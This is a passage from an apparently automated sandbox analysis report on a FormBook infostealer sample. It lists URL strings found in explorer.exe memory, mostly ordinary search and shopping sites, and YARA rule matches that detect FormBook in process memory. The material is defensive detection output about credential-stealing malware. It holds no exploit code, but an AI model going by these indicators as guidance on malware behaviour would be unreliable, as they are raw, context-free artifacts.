          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197502968.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2187542396.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2197502968.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000000.2177669632.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2187542396.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2186062266.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2187542396.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2186062266.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2185877942.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2193615801.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2186062266.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
